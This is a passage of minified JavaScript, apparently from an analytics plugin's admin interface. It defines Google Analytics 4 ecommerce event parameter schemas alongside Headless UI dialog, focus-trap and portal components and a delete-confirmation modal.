Boost"}},tutorial_begin:{},tutorial_complete:{},unlock_achievement:{achievement_id:{type:"text",required:!0,placeholder:"A_12345"}},view_cart:{currency:{type:"text",required:!0,placeholder:"USD"},value:{type:"number",required:!0,placeholder:"7.77"},items:{type:"text",required:!0,placeholder:""}},view_item:{currency:{type:"text",required:!0,placeholder:"USD"},value:{type:"number",required:!0,placeholder:"7.77"},items:{type:"text",required:!0,placeholder:""}},view_item_list:{item_list_id:{type:"text",required:!1,placeholder:"related_products"},item_list_name:{type:"text",required:!1,placeholder:"Related products"},items:{type:"text",required:!0,placeholder:""}},view_promotion:{creative_name:{type:"text",required:!1,placeholder:"summer_banner2"},creative_slot:{type:"text",required:!1,placeholder:"featured_app_1"},location_id:{type:"text",required:!1,placeholder:"L_12345"},promotion_id:{type:"text",required:!1,placeholder:"P_12345"},promotion_name:{type:"text",required:!1,placeholder:"Summer Sale"},items:{type:"text",required:!0,placeholder:""}}};var Nr,yr=(e=>(e.Space=" ",e.Enter="Enter",e.Escape="Escape",e.Backspace="Backspace",e.Delete="Delete",e.ArrowLeft="ArrowLeft",e.ArrowUp="ArrowUp",e.ArrowRight="ArrowRight",e.ArrowDown="ArrowDown",e.Home="Home",e.End="End",e.PageUp="PageUp",e.PageDown="PageDown",e.Tab="Tab",e))(yr||{});function pr(e){let t=e.parentElement,r=null;for(;t&&!(t instanceof HTMLFieldSetElement);)t instanceof HTMLLegendElement&&(r=t),t=t.parentElement;let a=""===(null==t?void 0:t.getAttribute("disabled"));return(!a||!function(e){if(!e)return!1;let t=e.previousElementSibling;for(;null!==t;){if(t instanceof HTMLLegendElement)return!1;t=t.previousElementSibling}return!0}(r))&&a}let gr=null!=(Nr=r.useId)?Nr:function(){let e=ot(),[t,a]=r.useState(e?()=>nt.nextId():null);return ut((()=>{null===t&&a(nt.nextId())}),[t]),null!=t?""+t:void 0};var xr=(e=>(e[e.None=1]="None",e[e.Focusable=2]="Focusable",e[e.Hidden=4]="Hidden",e))(xr||{});let wr=Je((function(e,t){let{features:r=1,...a}=e;return We({ourProps:{ref:t,"aria-hidden":2==(2&r)||void 0,style:{position:"fixed",top:1,left:1,width:1,height:0,padding:0,margin:-1,overflow:"hidden",clip:"rect(0, 0, 0, 0)",whiteSpace:"nowrap",borderWidth:"0",...4==(4&r)&&2!=(2&r)&&{display:"none"}}},theirProps:a,slot:{},defaultTag:"div",name:"Hidden"})}));function Tr(e){return nt.isServer?null:e instanceof Node?e.ownerDocument:null!=e&&e.hasOwnProperty("current")&&e.current instanceof Node?e.current.ownerDocument:document}let Er=["[contentEditable=true]","[tabindex]","a[href]","area[href]","button:not([disabled])","iframe","input:not([disabled])","select:not([disabled])","textarea:not([disabled])"].map((e=>`${e}:not([tabindex='-1'])`)).join(",");var Sr,Dr=(e=>(e[e.First=1]="First",e[e.Previous=2]="Previous",e[e.Next=4]="Next",e[e.Last=8]="Last",e[e.WrapAround=16]="WrapAround",e[e.NoScroll=32]="NoScroll",e))(Dr||{}),fr=((Sr=fr||{})[Sr.Error=0]="Error",Sr[Sr.Overflow=1]="Overflow",Sr[Sr.Success=2]="Success",Sr[Sr.Underflow=3]="Underflow",Sr),hr=(e=>(e[e.Previous=-1]="Previous",e[e.Next=1]="Next",e))(hr||{});var Ir=(e=>(e[e.Strict=0]="Strict",e[e.Loose=1]="Loose",e))(Ir||{});function Cr(e){null==e||e.focus({preventScroll:!0})}let zr=["textarea","input"].join(",");function br(e,t=(e=>e)){return e.slice().sort(((e,r)=>{let a=t(e),i=t(r);if(null===a||null===i)return 0;let n=a.compareDocumentPosition(i);return n&Node.DOCUMENT_POSITION_FOLLOWING?-1:n&Node.DOCUMENT_POSITION_PRECEDING?1:0}))}function Or(e,t,{sorted:r=!0,relativeTo:a=null,skipElements:i=[]}={}){let n=Array.isArray(e)?e.length>0?e[0].ownerDocument:document:e.ownerDocument,u=Array.isArray(e)?r?br(e):e:function(e=document.body){return null==e?[]:Array.from(e.querySelectorAll(Er)).sort(((e,t)=>Math.sign((e.tabIndex||Number.MAX_SAFE_INTEGER)-(t.tabIndex||Number.MAX_SAFE_INTEGER))))}(e);i.length>0&&u.length>1&&(u=u.filter((e=>!i.includes(e)))),a=null!=a?a:n.activeElement;let s,l=(()=>{if(5&t)return 1;if(10&t)return-1;throw new Error("Missing Focus.First, Focus.Previous, Focus.Next or Focus.Last")})(),o=(()=>{if(1&t)return 0;if(2&t)return Math.max(0,u.indexOf(a))-1;if(4&t)return Math.max(0,u.indexOf(a))+1;if(8&t)return u.length-1;throw new Error("Missing Focus.First, Focus.Previous, Focus.Next or Focus.Last")})(),c=32&t?{preventScroll:!0}:{},L=0,M=u.length;do{if(L>=M||L+M<=0)return 0;let e=o+L;if(16&t)e=(e+M)%M;else{if(e<0)return 3;if(e>=M)return 1}s=u[e],null==s||s.focus(c),L+=l}while(s!==n.activeElement);return 6&t&&function(e){var t,r;return null!=(r=null==(t=null==e?void 0:e.matches)?void 0:t.call(e,zr))&&r}(s)&&s.select(),s.hasAttribute("tabindex")||s.setAttribute("tabindex","0"),2}var vr=(e=>(e[e.Forwards=0]="Forwards",e[e.Backwards=1]="Backwards",e))(vr||{});function kr(...e){return(0,r.useMemo)((()=>Tr(...e)),[...e])}function Ar(e,t,a,i){let n=lt(a);(0,r.useEffect)((()=>{function r(e){n.current(e)}return(e=null!=e?e:window).addEventListener(t,r,i),()=>e.removeEventListener(t,r,i)}),[e,t,i])}function Yr(e,t){let a=(0,r.useRef)([]),i=ct(e);(0,r.useEffect)((()=>{let e=[...a.current];for(let[r,n]of t.entries())if(a.current[r]!==n){let r=i(t,e);return a.current=t,r}}),[i,...t])}function Ur(e){if(!e)return new Set;if("function"==typeof e)return new Set(e());let t=new Set;for(let r of e.current)r.current instanceof HTMLElement&&t.add(r.current);return t}var Qr=(e=>(e[e.None=1]="None",e[e.InitialFocus=2]="InitialFocus",e[e.TabLock=4]="TabLock",e[e.FocusLock=8]="FocusLock",e[e.RestoreFocus=16]="RestoreFocus",e[e.All=30]="All",e))(Qr||{});let Gr=Je((function(e,t){let a=(0,r.useRef)(null),i=dt(a,t),{initialFocus:n,containers:u,features:s=30,...l}=e;ot()||(s=1);let o=kr(a);!function({ownerDocument:e},t){let a=function(e=!0){let t=(0,r.useRef)(Rr.slice());return Yr((([e],[r])=>{!0===r&&!1===e&&jt((()=>{t.current.splice(0)})),!1===r&&!0===e&&(t.current=Rr.slice())}),[e,Rr,t]),ct((()=>{var e;return null!=(e=t.current.find((e=>null!=e&&e.isConnected)))?e:null}))}(t);Yr((()=>{t||(null==e?void 0:e.activeElement)===(null==e?void 0:e.body)&&Cr(a())}),[t]);let i=(0,r.useRef)(!1);(0,r.useEffect)((()=>(i.current=!1,()=>{i.current=!0,jt((()=>{i.current&&Cr(a())}))})),[])}({ownerDocument:o},Boolean(16&s));let c=function({ownerDocument:e,container:t,initialFocus:a},i){let n=(0,r.useRef)(null),u=st();return Yr((()=>{if(!i)return;let r=t.current;r&&jt((()=>{if(!u.current)return;let t=null==e?void 0:e.activeElement;if(null!=a&&a.current){if((null==a?void 0:a.current)===t)return void(n.current=t)}else if(r.contains(t))return void(n.current=t);null!=a&&a.current?Cr(a.current):Or(r,Dr.First)===fr.Error&&console.warn("There are no focusable elements inside the <FocusTrap />"),n.current=null==e?void 0:e.activeElement}))}),[i]),n}({ownerDocument:o,container:a,initialFocus:n},Boolean(2&s));!function({ownerDocument:e,container:t,containers:r,previousActiveElement:a},i){let n=st();Ar(null==e?void 0:e.defaultView,"focus",(e=>{if(!i||!n.current)return;let u=Ur(r);t.current instanceof HTMLElement&&u.add(t.current);let s=a.current;if(!s)return;let l=e.target;l&&l instanceof HTMLElement?Fr(u,l)?(a.current=l,Cr(l)):(e.preventDefault(),e.stopPropagation(),Cr(s)):Cr(a.current)}),!0)}({ownerDocument:o,container:a,containers:u,previousActiveElement:c},Boolean(8&s));let L=function(){let e=(0,r.useRef)(0);return function(e,t,a){let i=lt(t);(0,r.useEffect)((()=>{function t(e){i.current(e)}return window.addEventListener(e,t,a),()=>window.removeEventListener(e,t,a)}),[e,a])}("keydown",(t=>{"Tab"===t.key&&(e.current=t.shiftKey?1:0)}),!0),e}(),M=ct((e=>{let t=a.current;t&&qe(L.current,{[vr.Forwards]:()=>{Or(t,Dr.First,{skipElements:[e.relatedTarget]})},[vr.Backwards]:()=>{Or(t,Dr.Last,{skipElements:[e.relatedTarget]})}})})),d=pt(),j=(0,r.useRef)(!1),m={ref:i,onKeyDown(e){"Tab"==e.key&&(j.current=!0,d.requestAnimationFrame((()=>{j.current=!1})))},onBlur(e){let t=Ur(u);a.current instanceof HTMLElement&&t.add(a.current);let r=e.relatedTarget;r instanceof HTMLElement&&"true"!==r.dataset.headlessuiFocusGuard&&(Fr(t,r)||(j.current?Or(a.current,qe(L.current,{[vr.Forwards]:()=>Dr.Next,[vr.Backwards]:()=>Dr.Previous})|Dr.WrapAround,{relativeTo:e.target}):e.target instanceof HTMLElement&&Cr(e.target)))}};return r.createElement(r.Fragment,null,Boolean(4&s)&&r.createElement(wr,{as:"button",type:"button","data-headlessui-focus-guard":!0,onFocus:M,features:xr.Focusable}),We({ourProps:m,theirProps:l,defaultTag:"div",name:"FocusTrap"}),Boolean(4&s)&&r.createElement(wr,{as:"button",type:"button","data-headlessui-focus-guard":!0,onFocus:M,features:xr.Focusable}))})),Pr=Object.assign(Gr,{features:Qr}),Rr=[];if("undefined"!=typeof window&&"undefined"!=typeof document){let e=function(e){e.target instanceof HTMLElement&&e.target!==document.body&&Rr[0]!==e.target&&(Rr.unshift(e.target),Rr=Rr.filter((e=>null!=e&&e.isConnected)),Rr.splice(10))};window.addEventListener("click",e,{capture:!0}),window.addEventListener("mousedown",e,{capture:!0}),window.addEventListener("focus",e,{capture:!0}),document.body.addEventListener("click",e,{capture:!0}),document.body.addEventListener("mousedown",e,{capture:!0}),document.body.addEventListener("focus",e,{capture:!0})}function Fr(e,t){for(let r of e)if(r.contains(t))return!0;return!1}var _r=i(850);let qr=(0,r.createContext)(!1);function Br(){return(0,r.useContext)(qr)}function Zr(e){return r.createElement(qr.Provider,{value:e.force},e.children)}let Wr=r.Fragment,Hr=r.Fragment,Vr=(0,r.createContext)(null),Jr=Je((function(e,t){let a=e,i=(0,r.useRef)(null),n=dt(Mt((e=>{i.current=e})),t),u=kr(i),s=function(e){let t=Br(),a=(0,r.useContext)(Vr),i=kr(e),[n,u]=(0,r.useState)((()=>{if(!t&&null!==a||nt.isServer)return null;let e=null==i?void 0:i.getElementById("headlessui-portal-root");if(e)return e;if(null===i)return null;let r=i.createElement("div");return r.setAttribute("id","headlessui-portal-root"),i.body.appendChild(r)}));return(0,r.useEffect)((()=>{null!==n&&(null!=i&&i.body.contains(n)||null==i||i.body.appendChild(n))}),[n,i]),(0,r.useEffect)((()=>{t||null!==a&&u(a.current)}),[a,u,t]),n}(i),[l]=(0,r.useState)((()=>{var e;return nt.isServer?null:null!=(e=null==u?void 0:u.createElement("div"))?e:null})),o=ot(),c=(0,r.useRef)(!1);return ut((()=>{if(c.current=!1,s&&l)return s.contains(l)||(l.setAttribute("data-headlessui-portal",""),s.appendChild(l)),()=>{c.current=!0,jt((()=>{var e;c.current&&(!s||!l||(l instanceof Node&&s.contains(l)&&s.removeChild(l),s.childNodes.length<=0&&(null==(e=s.parentElement)||e.removeChild(s))))}))}}),[s,l]),o&&s&&l?(0,_r.createPortal)(We({ourProps:{ref:n},theirProps:a,defaultTag:Wr,name:"Portal"}),l):null})),Xr=Je((function(e,t){let{target:a,...i}=e,n={ref:dt(t)};return r.createElement(Vr.Provider,{value:a},We({ourProps:n,theirProps:i,defaultTag:Hr,name:"Popover.Group"}))})),Kr=Object.assign(Jr,{Group:Xr}),$r=(0,r.createContext)(null);function ea(){let e=(0,r.useContext)($r);if(null===e){let e=new Error("You used a <Description /> component, but it is not inside a relevant parent.");throw Error.captureStackTrace&&Error.captureStackTrace(e,ea),e}return e}function ta(){let[e,t]=(0,r.useState)([]);return[e.length>0?e.join(" "):void 0,(0,r.useMemo)((()=>function(e){let a=ct((e=>(t((t=>[...t,e])),()=>t((t=>{let r=t.slice(),a=r.indexOf(e);return-1!==a&&r.splice(a,1),r}))))),i=(0,r.useMemo)((()=>({register:a,slot:e.slot,name:e.name,props:e.props})),[a,e.slot,e.name,e.props]);return r.createElement($r.Provider,{value:i},e.children)}),[t])]}let ra=Je((function(e,t){let r=gr(),{id:a=`headlessui-description-${r}`,...i}=e,n=ea(),u=dt(t);return ut((()=>n.register(a)),[a,n.register]),We({ourProps:{ref:u,...n.props,id:a},theirProps:i,slot:n.slot||{},defaultTag:"p",name:n.name||"Description"})})),aa=Object.assign(ra,{}),ia=(0,r.createContext)((()=>{}));ia.displayName="StackContext";var na=(e=>(e[e.Add=0]="Add",e[e.Remove=1]="Remove",e))(na||{});function ua({children:e,onUpdate:t,type:a,element:i,enabled:n}){let u=(0,r.useContext)(ia),s=ct(((...e)=>{null==t||t(...e),u(...e)}));return ut((()=>{let e=void 0===n||!0===n;return e&&s(0,a,i),()=>{e&&s(1,a,i)}}),[s,a,i,n]),r.createElement(ia.Provider,{value:s},e)}function sa(e,t,a){let i=lt(t);(0,r.useEffect)((()=>{function t(e){i.current(e)}return document.addEventListener(e,t,a),()=>document.removeEventListener(e,t,a)}),[e,a])}function la(e,t,a=!0){let i=(0,r.useRef)(!1);function n(r,a){if(!i.current||r.defaultPrevented)return;let n=function e(t){return"function"==typeof t?e(t()):Array.isArray(t)||t instanceof Set?t:[t]}(e),u=a(r);if(null!==u&&u.getRootNode().contains(u)){for(let e of n){if(null===e)continue;let t=e instanceof HTMLElement?e:e.current;if(null!=t&&t.contains(u)||r.composed&&r.composedPath().includes(t))return}return!function(e,t=0){var r;return e!==(null==(r=Tr(e))?void 0:r.body)&&qe(t,{0:()=>e.matches(Er),1(){let t=e;for(;null!==t;){if(t.matches(Er))return!0;t=t.parentElement}return!1}})}(u,Ir.Loose)&&-1!==u.tabIndex&&r.preventDefault(),t(r,u)}}(0,r.useEffect)((()=>{requestAnimationFrame((()=>{i.current=a}))}),[a]);let u=(0,r.useRef)(null);sa("mousedown",(e=>{var t,r;i.current&&(u.current=(null==(r=null==(t=e.composedPath)?void 0:t.call(e))?void 0:r[0])||e.target)}),!0),sa("click",(e=>{u.current&&(n(e,(()=>u.current)),u.current=null)}),!0),sa("blur",(e=>n(e,(()=>window.document.activeElement instanceof HTMLIFrameElement?window.document.activeElement:null))),!0)}const oa="function"==typeof Object.is?Object.is:function(e,t){return e===t&&(0!==e||1/e==1/t)||e!=e&&t!=t},{useState:ca,useEffect:La,useLayoutEffect:Ma,useDebugValue:da}=a;function ja(e){const t=e.getSnapshot,r=e.value;try{const e=t();return!oa(r,e)}catch{return!0}}const ma="undefined"==typeof window||void 0===window.document||void 0===window.document.createElement?function(e,t,r){return t()}:function(e,t,r){const a=t(),[{inst:i},n]=ca({inst:{value:a,getSnapshot:t}});return Ma((()=>{i.value=a,i.getSnapshot=t,ja(i)&&n({inst:i})}),[e,a,t]),La((()=>(ja(i)&&n({inst:i}),e((()=>{ja(i)&&n({inst:i})})))),[e]),da(a),a},Na="useSyncExternalStore"in a?(e=>e.useSyncExternalStore)(a):ma;function ya(){let e;return{before({doc:t}){var r;let a=t.documentElement;e=(null!=(r=t.defaultView)?r:window).innerWidth-a.clientWidth},after({doc:t,d:r}){let a=t.documentElement,i=a.clientWidth-a.offsetWidth,n=e-i;r.style(a,"paddingRight",`${n}px`)}}}function pa(){return/iPhone/gi.test(window.navigator.platform)||/Mac/gi.test(window.navigator.platform)&&window.navigator.maxTouchPoints>0}function ga(){if(!pa())return{};let e;return{before(){e=window.pageYOffset},after({doc:t,d:r,meta:a}){function i(e){return a.containers.flatMap((e=>e())).some((t=>t.contains(e)))}r.style(t.body,"marginTop",`-${e}px`),window.scrollTo(0,0);let n=null;r.addEventListener(t,"click",(e=>{if(e.target instanceof HTMLElement)try{let r=e.target.closest("a");if(!r)return;let{hash:a}=new URL(r.href),u=t.querySelector(a);u&&!i(u)&&(n=u)}catch{}}),!0),r.addEventListener(t,"touchmove",(e=>{e.target instanceof HTMLElement&&!i(e.target)&&e.preventDefault()}),{passive:!1}),r.add((()=>{window.scrollTo(0,window.pageYOffset+e),n&&n.isConnected&&(n.scrollIntoView({block:"nearest"}),n=null)}))}}}function xa(e){let t={};for(let r of e)Object.assign(t,r(t));return t}let wa=function(e,t){let r=new Map,a=new Set;return{getSnapshot:()=>r,subscribe:e=>(a.add(e),()=>a.delete(e)),dispatch(e,...i){let n=t[e].call(r,...i);n&&(r=n,a.forEach((e=>e())))}}}(0,{PUSH(e,t){var r;let a=null!=(r=this.get(e))?r:{doc:e,count:0,d:mt(),meta:new Set};return a.count++,a.meta.add(t),this.set(e,a),this},POP(e,t){let r=this.get(e);return r&&(r.count--,r.meta.delete(t)),this},SCROLL_PREVENT({doc:e,d:t,meta:r}){let a={doc:e,d:t,meta:xa(r)},i=[ga(),ya(),{before({doc:e,d:t}){t.style(e.documentElement,"overflow","hidden")}}];i.forEach((({before:e})=>null==e?void 0:e(a))),i.forEach((({after:e})=>null==e?void 0:e(a)))},SCROLL_ALLOW({d:e}){e.dispose()},TEARDOWN({doc:e}){this.delete(e)}});wa.subscribe((()=>{let e=wa.getSnapshot(),t=new Map;for(let[r]of e)t.set(r,r.documentElement.style.overflow);for(let r of e.values()){let e="hidden"===t.get(r.doc),a=0!==r.count;(a&&!e||!a&&e)&&wa.dispatch(r.count>0?"SCROLL_PREVENT":"SCROLL_ALLOW",r),0===r.count&&wa.dispatch("TEARDOWN",r)}}));let Ta=new Map,Ea=new Map;function Sa(e,t=!0){ut((()=>{var r;if(!t)return;let a="function"==typeof e?e():e.current;if(!a)return;let i=null!=(r=Ea.get(a))?r:0;return Ea.set(a,i+1),0!==i||(Ta.set(a,{"aria-hidden":a.getAttribute("aria-hidden"),inert:a.inert}),a.setAttribute("aria-hidden","true"),a.inert=!0),function(){var e;if(!a)return;let t=null!=(e=Ea.get(a))?e:1;if(1===t?Ea.delete(a):Ea.set(a,t-1),1!==t)return;let r=Ta.get(a);r&&(null===r["aria-hidden"]?a.removeAttribute("aria-hidden"):a.setAttribute("aria-hidden",r["aria-hidden"]),a.inert=r.inert,Ta.delete(a))}}),[e,t])}var Da=(e=>(e[e.Open=0]="Open",e[e.Closed=1]="Closed",e))(Da||{}),fa=(e=>(e[e.SetTitleId=0]="SetTitleId",e))(fa||{});let ha={0:(e,t)=>e.titleId===t.id?e:{...e,titleId:t.id}},Ia=(0,r.createContext)(null);function Ca(e){let t=(0,r.useContext)(Ia);if(null===t){let t=new Error(`<${e} /> is missing a parent <Dialog /> component.`);throw Error.captureStackTrace&&Error.captureStackTrace(t,Ca),t}return t}function za(e,t){return qe(t.type,ha,e,t)}Ia.displayName="DialogContext";let ba=Be.RenderStrategy|Be.Static,Oa=Je((function(e,t){let a=gr(),{id:i=`headlessui-dialog-${a}`,open:n,onClose:u,initialFocus:s,__demoMode:l=!1,...o}=e,[c,L]=(0,r.useState)(0),M=tt();void 0===n&&null!==M&&(n=(M&et.Open)===et.Open);let d=(0,r.useRef)(null),j=dt(d,t),m=(0,r.useRef)(null),N=kr(d),y=e.hasOwnProperty("open")||null!==M,p=e.hasOwnProperty("onClose");if(!y&&!p)throw new Error("You have to provide an `open` and an `onClose` prop to the `Dialog` component.");if(!y)throw new Error("You provided an `onClose` prop to the `Dialog`, but forgot an `open` prop.");if(!p)throw new Error("You provided an `open` prop to the `Dialog`, but forgot an `onClose` prop.");if("boolean"!=typeof n)throw new Error(`You provided an \`open\` prop to the \`Dialog\`, but the value is not a boolean. Received: ${n}`);if("function"!=typeof u)throw new Error(`You provided an \`onClose\` prop to the \`Dialog\`, but the value is not a function. Received: ${u}`);let g=n?0:1,[x,w]=(0,r.useReducer)(za,{titleId:null,descriptionId:null,panelRef:(0,r.createRef)()}),T=ct((()=>u(!1))),E=ct((e=>w({type:0,id:e}))),S=!!ot()&&!l&&0===g,D=c>1,f=null!==(0,r.useContext)(Ia),h=D?"parent":"leaf",I=null!==M&&(M&et.Closing)===et.Closing,C=!f&&!I&&S,z=(0,r.useCallback)((()=>{var e,t;return null!=(t=Array.from(null!=(e=null==N?void 0:N.querySelectorAll("body > *"))?e:[]).find((e=>"headlessui-portal-root"!==e.id&&e.contains(m.current)&&e instanceof HTMLElement)))?t:null}),[m]);Sa(z,C);let b=!!D||S,O=(0,r.useCallback)((()=>{var e,t;return null!=(t=Array.from(null!=(e=null==N?void 0:N.querySelectorAll("[data-headlessui-portal]"))?e:[]).find((e=>e.contains(m.current)&&e instanceof HTMLElement)))?t:null}),[m]);Sa(O,b);let v=ct((()=>{var e,t;return[...Array.from(null!=(e=null==N?void 0:N.querySelectorAll("html > *, body > *, [data-headlessui-portal]"))?e:[]).filter((e=>!(e===document.body||e===document.head||!(e instanceof HTMLElement)||e.contains(m.current)||x.panelRef.current&&e.contains(x.panelRef.current)))),null!=(t=x.panelRef.current)?t:d.current]}));la((()=>v()),T,!(!S||D));let k=!(D||0!==g);Ar(null==N?void 0:N.defaultView,"keydown",(e=>{k&&(e.defaultPrevented||e.key===yr.Escape&&(e.preventDefault(),e.stopPropagation(),T()))})),function(e,t,r=(()=>[document.body])){!function(e,t,r){let a=Na((u=wa).subscribe,u.getSnapshot,u.getSnapshot),i=e?a.get(e):void 0,n=!!i&&i.count>0;var u;ut((()=>{if(e&&t)return wa.dispatch("PUSH",e,r),()=>wa.dispatch("POP",e,r)}),[t,e])}(e,t,(e=>{var t;return{containers:[...null!=(t=e.containers)?t:[],r]}}))}(N,!(I||0!==g||f),v),(0,r.useEffect)((()=>{if(0!==g||!d.current)return;let e=new ResizeObserver((e=>{for(let t of e){let e=t.target.getBoundingClientRect();0===e.x&&0===e.y&&0===e.width&&0===e.height&&T()}}));return e.observe(d.current),()=>e.disconnect()}),[g,d,T]);let[A,Y]=ta(),U=(0,r.useMemo)((()=>[{dialogState:g,close:T,setTitleId:E},x]),[g,x,T,E]),Q=(0,r.useMemo)((()=>({open:0===g})),[g]),G={ref:j,id:i,role:"dialog","aria-modal":0===g||void 0,"aria-labelledby":x.titleId,"aria-describedby":A};return r.createElement(ua,{type:"Dialog",enabled:0===g,element:d,onUpdate:ct(((e,t)=>{"Dialog"===t&&qe(e,{[na.Add]:()=>L((e=>e+1)),[na.Remove]:()=>L((e=>e-1))})}))},r.createElement(Zr,{force:!0},r.createElement(Kr,null,r.createElement(Ia.Provider,{value:U},r.createElement(Kr.Group,{target:d},r.createElement(Zr,{force:!1},r.createElement(Y,{slot:Q,name:"Dialog.Description"},r.createElement(Pr,{initialFocus:s,containers:v,features:S?qe(h,{parent:Pr.features.RestoreFocus,leaf:Pr.features.All&~Pr.features.FocusLock}):Pr.features.None},We({ourProps:G,theirProps:o,slot:Q,defaultTag:"div",features:ba,visible:0===g,name:"Dialog"})))))))),r.createElement(wr,{features:xr.Hidden,ref:m}))})),va=Je((function(e,t){let a=gr(),{id:i=`headlessui-dialog-backdrop-${a}`,...n}=e,[{dialogState:u},s]=Ca("Dialog.Backdrop"),l=dt(t);(0,r.useEffect)((()=>{if(null===s.panelRef.current)throw new Error("A <Dialog.Backdrop /> component is being used, but a <Dialog.Panel /> component is missing.")}),[s.panelRef]);let o=(0,r.useMemo)((()=>({open:0===u})),[u]);return r.createElement(Zr,{force:!0},r.createElement(Kr,null,We({ourProps:{ref:l,id:i,"aria-hidden":!0},theirProps:n,slot:o,defaultTag:"div",name:"Dialog.Backdrop"})))})),ka=Je((function(e,t){let a=gr(),{id:i=`headlessui-dialog-panel-${a}`,...n}=e,[{dialogState:u},s]=Ca("Dialog.Panel"),l=dt(t,s.panelRef),o=(0,r.useMemo)((()=>({open:0===u})),[u]),c=ct((e=>{e.stopPropagation()}));return We({ourProps:{ref:l,id:i,onClick:c},theirProps:n,slot:o,defaultTag:"div",name:"Dialog.Panel"})})),Aa=Je((function(e,t){let a=gr(),{id:i=`headlessui-dialog-overlay-${a}`,...n}=e,[{dialogState:u,close:s}]=Ca("Dialog.Overlay"),l=dt(t),o=ct((e=>{if(e.target===e.currentTarget){if(pr(e.currentTarget))return e.preventDefault();e.preventDefault(),e.stopPropagation(),s()}}));return We({ourProps:{ref:l,id:i,"aria-hidden":!0,onClick:o},theirProps:n,slot:(0,r.useMemo)((()=>({open:0===u})),[u]),defaultTag:"div",name:"Dialog.Overlay"})})),Ya=Je((function(e,t){let a=gr(),{id:i=`headlessui-dialog-title-${a}`,...n}=e,[{dialogState:u,setTitleId:s}]=Ca("Dialog.Title"),l=dt(t);(0,r.useEffect)((()=>(s(i),()=>s(null))),[i,s]);let o=(0,r.useMemo)((()=>({open:0===u})),[u]);return We({ourProps:{ref:l,id:i},theirProps:n,slot:o,defaultTag:"h2",name:"Dialog.Title"})})),Ua=Object.assign(Oa,{Backdrop:va,Panel:ka,Overlay:Aa,Title:Ya,Description:aa});const Qa=(0,r.createContext)(),Ga=(0,r.createContext)(),Pa=(0,r.createContext)(),Ra=(0,r.createContext)();function Fa(t){let{open:a,toggleDeleteModal:i,index:n,item_id:u,deleteItem:s}=t;return(0,e.createElement)(vt.Root,{show:a,as:r.Fragment},(0,e.createElement)(Ua,{as:"div",className:"z-[9999992] relative",onClose:i},(0,e.createElement)(vt.Child,{as:r.Fragment,enter:"ease-out duration-300",enterFrom:"opacity-0",enterTo:"opacity-100",leave:"ease-in duration-200",leaveFrom:"opacity-100",leaveTo:"opacity-0"},(0,e.createElement)("div",{className:"fixed inset-0 bg-gray-500 bg-opacity-75 transition-opacity"})),(0,e.createElement)("div",{className:"fixed  inset-0 overflow-y-auto"},(0,e.createElement)("div",{className:"flex items-end sm:items-center justify-center min-h-full p-4 text-center sm:p-0"},(0,e.createElement)(vt.Child,{as:r.Fragment,enter:"ease-out duration-300",enterFrom:"opacity-0 translate-y-4 sm:translate-y-0 sm:scale-95",enterTo:"opacity-100 translate-y-0 sm:scale-100",leave:"ease-in duration-200",leaveFrom:"opacity-100 translate-y-0 sm:scale-100",leaveTo:"opacity-0 translate-y-4 sm:translate-y-0 sm:scale-95"},(0,e.createElement)(Ua.Panel,{className:"relative bg-white rounded-lg px-4 pt-5 pb-4 text-left overflow-hidden shadow-xl transform transition-all sm:my-8 sm:max-w-lg sm:w-full sm:p-6"},(0,e.createElement)("div",{className:"sm:flex sm:items-start"},(0,e.createElement)("div",{className:"mx-auto flex-shrink-0 flex items-center justify-center h-12 w-12 rounded-full bg-red-100 sm:mx-0 sm:h-10 sm:w-10"}),(0,e.createElement)("div",{className:"mt-3 text-center sm:mt-0 sm:ml-4 sm:text-left"},(0,e.createElement)(Ua.Title,{as:"h3",className:"text-lg leading-6 font-medium text-gray-900"},"Delete Item"),(0,e.createElement)("div",{className:"mt-2"},(0,e.createElement)("p",{className:"text-sm text-gray-500"},"Are you sure you want to delete the"," ",(0,e.createElement)("span",{className:"strong"},u)," item?")))),(0,e.createElement)("div",{className:"mt-5 sm:mt-4 sm:flex sm:flex-row-reverse"},(0,e.createElement)("button",{type:"button",className:"w-full inline-flex justify-center rounded-md border border-transparent shadow-sm px-4 py-2 bg-red-600 text-base font-medium text-white hover:bg-red-700 focus:outline-none focus:ring-2 focus:ring-offset-2 focus:ring-red-500 sm:ml-3 sm:w-auto sm:text-sm",onClick:function(){s(n),i()}},"Delete"),(0,e.createElement)("button",{type:"button",className:"mt-3 w-full inline-flex justify-center rounded-md border border-gray-300 shadow-sm px-4 py-2 bg-white text-base font-medium text-gray-700 hover:bg-gray-50 focus:outline-none focus:ring-2 focus:ring-offset-2 focus:ring-indigo-500 sm:mt-0 sm:w-auto sm:text-sm",onClick:i},"Cancel"))))))))}function _a(t){let{pKey:r,pValue:a,required:i,type:n,placeholder:u,setItem:s}=t;return(0,e.createElement)("fieldset",{className:"first:pt-0 sm:grid sm:grid-cols-3 sm:gap-4 sm:items-start sm:border-t sm:border-gray-200 sm:pt-5"},(0,e.createElement)("label",{htmlFor:"items",className:"block text-sm font-medium text-gray-700 sm:mt-px sm:pt-2"+(1==i?" required":"")},r),(0,e.createElement)("input",{type:n,required:i,name:r,placeholder:u,id:r,value:a||"",onChange:e=>s(r,e.target.value),className:"flex-1 block col-span-2 w-full focus:ring-indigo-500 focus:border-indigo-500 min-w-0 rounded-none rounded-r-md sm:text-sm border-gray-300"}))}const qa={add_payment_info:{item_id:{type:"text",required:!0,placeholder:"SKU_12345"},item_name:{type:"text",required:!0,placeholder:"Stan and Friends Tee"},affiliation:{type:"text",required:!1,placeholder:"Google Store"},coupon:{type:"text",required:!1,placeholder:"SUMMER_FUN"},currency:{type:"text",required:!1,placeholder:"USD"},discount:{type:"number",required:!1,placeholder:"2.22"},index:{type:"number",required:!1,placeholder:"5"},item_brand:{type:"text",required:!1,placeholder:"Google"},item_category:{type:"text",required:!1,placeholder:"Apparel"},item_category2:{type:"text",required:!1,placeholder:"Adult"},item_category3:{type:"text",required:!1,placeholder:"Shirts"},item_category4:{type:"text",required:!1,placeholder:"Crew"},item_category5:{type:"text",required:!1,placeholder:"Short sleeve"},item_list_id:{type:"text",required:!1,placeholder:"related_products"},item_list_name:{type:"text",required:!1,placeholder:"Related products"},item_variant:{type:"text",required:!1,placeholder:"green"},location_id:{type:"text",required:!1,placeholder:"L_12345"},price:{type:"number",required:!1,placeholder:"9.99"},quantity:{type:"number",required:!1,placeholder:"1"}},add_shipping_info:{item_id:{type:"text",required:!0,placeholder:"SKU_12345"},item_name:{type:"text",required:!0,placeholder:"Stan and Friends Tee"},affiliation:{type:"text",required:!1,placeholder:"Google 